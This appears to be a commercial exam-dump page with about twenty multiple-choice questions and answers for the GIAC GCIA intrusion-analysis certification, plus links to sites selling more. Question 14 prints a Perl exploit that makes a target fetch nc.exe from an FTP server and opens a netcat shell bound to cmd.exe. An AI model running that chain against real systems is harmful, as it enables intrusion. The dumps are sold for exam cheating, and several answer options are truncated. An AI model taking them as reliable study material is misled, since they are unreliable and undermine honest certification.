★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions
Free Instant Download NEW GCIA Exam Dumps (PDF & VCE):
Available on:
https://www.certleader.com/GCIA-dumps.html
Our pass rate is high to 98.9% and the similarity percentage between our GCIA study guide and real exam is 90% based on our seven-year educating experience. Do you want achievements in the GIAC GCIA exam in just one try? I am currently studying for the GIAC GCIA exam. Latest GIAC GCIA Test exam practice questions and answers, Try GIAC GCIA Brain Dumps First.
Also have GCIA free dumps questions for you:
NEW QUESTION 1
What are the advantages of an application layer firewall?
Each correct answer represents a complete solution. Choose all that apply.
- A. It provides detailed logging information for management purpose
- B. It prevents most of the spoofing and DoS attack
- C. It monitors and filters dat
- D. It provides authentication to a devic
Answer: ABC
NEW QUESTION 2
Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information. Which of the following disk spaces will he use to store this secret information?
Each correct answer represents a complete solution. Choose all that apply.
- A. Slack space
- B. Dumb space
- C. Hidden partition
- D. Unused Sectors
Answer: ACD
NEW QUESTION 3
You work as a Network Administrator for Net Perfect Inc. The company's network is configured with Internet Security and Acceleration (ISA) Server 2000 to provide firewall services. You want to block all e-mails coming from the domain named fun4you.com. How will you accomplish this?
- A. Enable POP intrusion detection filter Block e-mails from the fun4you.com domain
- B. Enable SMTP filter Add the fun4you.com domain name to the list of rejected domains
- C. Create a site and content rule to prohibit access to the fun4you.com domain
- D. Create a protocol rule that allows only authorized users to use the SMTP protocol
Answer: B
NEW QUESTION 4
Which of the following types of firewall functions by creating two different communications, one between the client and the firewall, and the other between the firewall and the end server?
- A. Stateful firewall
- B. Proxy-based firewall
- C. Packet filter firewall
- D. Endian firewall
Answer: B
NEW QUESTION 5
Which of the following forensic tool suite is developed for Linux operating system?
- A. Wetstone
- B. MForensicsLab
- C. ProDiscover
- D. S.M.A.R.
Answer: D
NEW QUESTION 6
Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?
- A. Propagating Cipher Block Chaining (PCBC) Mode
- B. Cipher Block Chaining (CBC) Mode
- C. Electronic Codebook (ECB) Mode
- D. Cipher Feedback (CFB) Mode
Answer: B
NEW QUESTION 7
In a complex network, Router transfers data packets by observing some form of parameters or metrics provided in the routing table. Which of the following metrics is NOT included in the routing table?
- A. Frequency
- B. Delay
- C. Load
- D. Bandwidth
Answer: A
NEW QUESTION 8
Victor works as a network administrator for DataSecu Inc. He uses a dual firewall Demilitarized
Zone (DMZ) to insulate the rest of the network from the portions that is available to the Internet.
Which of the following security threats may occur if DMZ protocol attacks are performed?
Each correct answer represents a complete solution. Choose all that apply.
- A. Attacker can perform Zero Day attack by delivering a malicious payload that is not a part of the intrusion detection/prevention systems guarding the networ
- B. Attacker can gain access to the Web server in a DMZ and exploit the databas
- C. Attacker managing to break the first firewall defense can access the internal network without breaking the second firewall if it is differen
- D. Attacker can exploit any protocol used to go into the internal network or intranet of the com pany
Answer: ABD
NEW QUESTION 9
Which of the following are well-known ports?
Each correct answer represents a complete solution. Choose two.
- A. 443
- B. 21
- C. 1024
- D. 8080
Answer: AB
NEW QUESTION 10
Drag and drop the appropriate protocols to their respective port numbers they use by default.
- A.
Answer: A
NEW QUESTION 11
Which of the following utilities allows to view all files including invisible files and folders on a Macintosh OS X?
- A. Directory Scan
- B. Folder Scan
- C. File Scan
- D. System Scan
Answer: A
NEW QUESTION 12
You work as a Network Administrator for Tech2tech Inc. You have configured a network-based IDS for your company.
You have physically installed sensors at all key positions throughout the network such that they all report to the command console.
What will be the key functions of the sensors in such a physical layout?
Each correct answer represents a complete solution. Choose all that apply.
- A. To collect data from operating system logs
- B. To notify the console with an alert if any intrusion is detected
- C. To analyze for known signatures
- D. To collect data from Web servers
Answer: BC
NEW QUESTION 13
Which of the following tools performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs?
- A. Dsniff
- B. Snort
- C. Nikto
- D. Sniffer
Answer: C
NEW QUESTION 14
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl
msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system
("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
bin>>sasfile\"");
system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get
hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server
is
downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download
is
finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
- A. Opens up a SMTP server that requires no username or password
- B. Creates a share called "sasfile" on the target system
- C. Creates an FTP server with write permissions enabled
- D. Opens up a telnet listener that requires no username or password
Answer: D
NEW QUESTION 15
Which of the following is the process of categorizing attack alerts produced from IDS?
- A. Blocking
- B. Site policy implementation
- C. Intrusion classify
- D. Alarm filtering
Answer: D
NEW QUESTION 16
Which of the following is a checksum algorithm?
- A. Dsniff
- B. Adler-32
- C. Hash buster
- D. Snort
Answer: B
NEW QUESTION 17
Which of the following commands will you use with the tcpdump command to capture the traffic from a filter stored in a file?
- A. tcpdump -A file_name
- B. tcpdump -D file_name
- C. tcpdump -X file_name
- D. tcpdump -F file_name
Answer: D
NEW QUESTION 18
ORRECT TEXT
Fill in the blank with the appropriate term.
___________is the practice of monitoring and potentially restricting the flow of information outbound from one network to another
- A. Egress filtering
Answer: A
NEW QUESTION 19
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.
A branch office is connected to the headquarters through a T1 line. Users at the branch office report poor voice quality on the IP phone while communicating with the headquarters. You find that an application, named WorkReport, at the branch office is suffocating bandwidth by sending large packets for file synchronization. You need to improve the voice quality on the IP phone. Which of the following steps will you choose to accomplish this?
- A. Configure traffic shaping to increase the time interval for the WorkReport packet
- B. Configure traffic shaping to increase the time interval for the IP phone packet
- C. Configure traffic shaping to reduce bandwidth for the IP phon
- D. Configure traffic shaping to reduce bandwidth for WorkRepor
Answer: D
NEW QUESTION 20
Which of the following tools performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs?
- A. Dsniff
- B. Snort
- C. Nikto
- D. Sniffer
Answer: C
NEW QUESTION 21
......
Recommend!! Get the Full GCIA dumps in VCE and PDF From 2passeasy, Welcome to Download: https://www.2passeasy.com/dumps/GCIA/ (New 508 Q&As Version)